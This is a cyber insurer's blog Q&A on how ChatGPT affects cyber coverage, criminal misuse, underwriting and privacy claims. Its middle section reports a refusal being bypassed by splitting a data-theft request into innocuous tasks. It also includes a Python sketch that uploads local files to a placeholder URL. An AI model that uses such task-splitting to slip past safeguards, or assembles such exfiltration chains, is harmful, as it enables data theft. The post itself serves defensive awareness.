
Generative AI is here. How does it impact cyber insurance?

ChatGPT, the AI-fueled chatbot you keep reading articles about, reached 100 million monthly active users only two months after its launch. For context, it took Twitter two years to reach one million users. Seemingly overnight, businesses started turning to ChatGPT en masse to increase efficiency.

Even traditional insurance carriers, not known for accepting change with open arms, are implementing generative AI for customer service chatbots and claims filing. (More on what we're doing at Corvus later.)

If even digitally averse industries are acclimating to life with ChatGPT, it comes as no surprise that threat actors are finding ways to capitalize on it for malicious activities. And as more and more of us turn to generative AI to do some of the heavy lifting at our day jobs, we face increasing uncertainties. Could this lead to Large Language Models accessing sensitive data? What's the impact on cyber coverage? How can organizations responsibly use generative AI? How do we manage cybersecurity and generative AI to prevent cyber incidents?

We compiled common questions we’re hearing from brokers, like the ones above, and our insurance and security experts answered (so no, you don’t have to go ask ChatGPT).

Common Insurance & Security Questions About ChatGPT:

Q: Will organizations that use ChatGPT see it impact their cyber coverage?

As of right now, you probably won’t see any questions on cyber insurance applications related to ChatGPT or generative AI. While more and more organizations are finding ways to implement these new technologies into their workflows to save time and resources, it’s by no means integral to the functioning of day-to-day processes within most business classes (yet). 

We’re risk-averse by trade, so we suggest that all organizations beginning to incorporate ChatGPT do so with caution. Generative AI can be an incredibly helpful tool — with the right oversight from human experts and best practices for cybersecurity risk management.

For example, professional service firms are exploring ways that ChatGPT can augment their staff. But if a client reaches out to their accountant or a cybersecurity expert looking for personalized advice, and AI is used to answer, can we trust that it'll be as consistently accurate (or thorough) as a response from a licensed human with years of training and experience?

“Something to consider is if your E&O insurance company will back your usage of ChatGPT down the line,” explains Pete Hedberg, Vice President of Cyber Tech E&O Underwriting. “As rapid adoption continues, insurers will need to look at how effective it is and then determine how to carve out coverage going forward. I expect we’ll see changes coming soon, which is a profound statement in the world of insurance, where things move slowly and carefully.”

Q: How are cybercriminals using ChatGPT to their advantage? What should we watch for?

Generative AI is shaking up some long-held convictions about cybercriminals. For one, poor spelling and grammar have traditionally been telltale signs of a phishing email composed by threat actors who aren't native English speakers. But with the assistance of ChatGPT, which is adept at producing content that looks like it was written by a human, a keen eye will be necessary to spot scams such as phishing attacks.

ChatGPT is lowering the barrier to entry for a career cybercriminal, and the dark web is taking notice: there were more than 4,000 mentions of ChatGPT on underground cybercriminal forums in February alone. Now, threat actors don't need to be particularly fluent in English or in coding languages to successfully deceive organizations and profit from them. Not only are phishing emails becoming more convincing, but technical novices are only a few minutes of effort away from creating malware with ChatGPT.

In response to this worrying trend of criminal misuse, OpenAI implemented several filters and restrictions to prevent users from requesting a ransomware binary (originally, any request worked as long as it didn't use the word "ransomware"). Now it's a little trickier, but threat actors are actively exploring workarounds for these types of restrictions.

“In the dark web early on, we were seeing a lot of creative ideas about all the malware you could write with the assistance of ChatGPT. Now, a main focus of conversation is how to bypass censorship filters,” says Ryan Bell, Threat Intelligence Manager. 

The Corvus Threat Intelligence team investigated how well ChatGPT's restrictions hold up. While their original request outlining the steps of a simple data theft attack was denied and flagged as unethical, the team quickly found a workaround for the security controls: when they separated the request into individual tasks, ChatGPT happily obliged.

[DIAGRAM] ChatGPT Python Snippet

[DIAGRAM] ChatGPT Python Snippet #2
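The screenshots above show the snippets ChatGPT returned. As a rough, hypothetical sketch of the same idea (the folder path and upload URL below are placeholders, not anything from the team's test), notice how routine each individual piece looks:

```python
import glob

import requests  # third-party: pip install requests

# Request 1 on its own looks like ordinary file management:
# "write a function that lists the text files in a folder."
def find_documents(folder):
    return glob.glob(f"{folder}/*.txt")

# Request 2 on its own looks like ordinary web programming:
# "write a function that uploads a file to a web server."
def upload_file(path, url):
    with open(path, "rb") as f:
        requests.post(url, files={"file": f})

# Chained together, the individually "harmless" answers form the
# data-theft workflow that the combined request was refused for.
for doc in find_documents("./reports"):             # placeholder path
    upload_file(doc, "https://example.com/upload")  # placeholder URL
```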

“By themselves, these steps are innocuous. But we’re dealing with an algorithm here, not a human being. It’s still possible to trick ChatGPT into doing things that you probably shouldn’t be doing,” adds Bell.

Q: Are cyber underwriters using generative AI at Corvus? 

Administrative, non-core tasks take up 40 percent of an underwriter's time, reports Microsoft. With days bogged down by chaotic workflows, overflowing inboxes, and demanding data entry, an obvious question presents itself, much as it has in other industries that have turned to AI to lighten their workloads: how can we adopt new tools to focus on what really matters?

The answer isn’t as simple as budgeting for new technical solutions. In fact, 64% of underwriters told Accenture that technology has increased their workload or made no difference. One said: “It helps with better decision making, but it adds time for each submission to open and use all the new tools.” 

To create room for underwriters to focus where their expertise is necessary, like broker relationships, converting valuable opportunities, and long-term book growth, we’re collaborating cross-functionally with security teams and underwriters to create solutions that simplify tasks where we can.

The Corvus Risk Navigator platform places real-time suggestions into the underwriting workflow based on a matrix of data including firmographics, threat intelligence, claims, and peer benchmarking. Our most recent updates to the smart insurance platform further automate low-value tasks in the underwriter's workflow, leveraging the latest developments in AI: Large Language Models (LLMs), natural language processing (NLP), and object recognition.

This removes the need for underwriters to validate industry classifications by manually reviewing organizational websites (a necessary step for determining risk); AI performs the heavy lifting by examining the website and classifying the industry, serving as a much-needed underwriting assistant.
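For illustration only (this is a minimal sketch of the general pattern, not Corvus's implementation), an LLM-assisted industry classifier might look something like the following. It assumes the third-party requests, beautifulsoup4, and openai packages; the model name, prompt, and label examples are placeholders:

```python
import requests                 # pip install requests
from bs4 import BeautifulSoup   # pip install beautifulsoup4
from openai import OpenAI       # pip install openai

client = OpenAI()  # reads OPENAI_API_KEY from the environment

def classify_industry(website_url: str) -> str:
    # Step 1: pull the visible text from the organization's homepage.
    html = requests.get(website_url, timeout=10).text
    text = BeautifulSoup(html, "html.parser").get_text(" ", strip=True)[:4000]

    # Step 2: ask an LLM to map that text to a single industry label.
    response = client.chat.completions.create(
        model="gpt-4o-mini",  # placeholder model choice
        messages=[
            {"role": "system",
             "content": "Classify the business described below into one "
                        "industry label such as 'Healthcare', 'Legal "
                        "Services', or 'Manufacturing'. Reply with the "
                        "label only."},
            {"role": "user", "content": text},
        ],
    )
    return response.choices[0].message.content.strip()

print(classify_industry("https://example.com"))  # placeholder URL
```

Keeping a human underwriter in the loop to confirm the suggested label is what makes a tool like this an assistant rather than a replacement.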

Q: Could the use of ChatGPT lead to claims down the line?

There are two major concerns on the horizon:

  1. Organizations will share personally identifiable information with a large language model's developer without consent.
  2. Professional service firms will use ChatGPT to provide advice to clients (advice that traditionally comes from licensed experts), and ChatGPT will give bad advice.

While significant measures haven't been taken yet, organizations should be prepared to answer questions within the next year about how they are using AI, specifically what privacy provisions and cyber mitigation tactics they have in place. Entering personally identifiable information into the free version of ChatGPT, even something as seemingly innocuous as an IP address, may unwittingly violate data protection laws by sending information to OpenAI without consent.
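One practical mitigation is to scrub obvious identifiers from text before it leaves the organization. The sketch below is a minimal, hypothetical example; the two patterns it covers (IP addresses and email addresses) are illustrative and nowhere near an exhaustive PII filter:

```python
import re

# Illustrative patterns only; real PII detection needs much broader coverage.
PII_PATTERNS = {
    "IP_ADDRESS": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "EMAIL": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),
}

def redact(text: str) -> str:
    """Replace recognized identifiers with tags before sending text to an LLM."""
    for label, pattern in PII_PATTERNS.items():
        text = pattern.sub(f"[{label}]", text)
    return text

prompt = "User at 203.0.113.7 (jane@example.com) reported a login failure."
print(redact(prompt))
# -> "User at [IP_ADDRESS] ([EMAIL]) reported a login failure."
```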

Cyber insurers are going to want to know whether organizations are using any sort of generative AI, and whether they have contracted that use and negotiated the appropriate terms and conditions to secure data privacy. This is especially important as wrongful collection of data claims continue to skyrocket. Litigation has primarily been tied to the use of ad-tracking technology on healthcare websites or to the Biometric Information Privacy Act, but as ChatGPT gains notoriety, irresponsible usage will likely open a new avenue for data privacy lawsuits.

To address the latter concern, that businesses may be liable for providing bad information, consider an instance where a doctor uses a medical device to complete a surgery and the device fails.

“It’s going to be the doctor that faces a negligence lawsuit,” Hedberg says. “I don’t think there will be an instance where a professional service firm can say that ChatGPT provided the wrong information and then skirt the blame. It was their professional decision to use ChatGPT that led to the alleged damages.” 
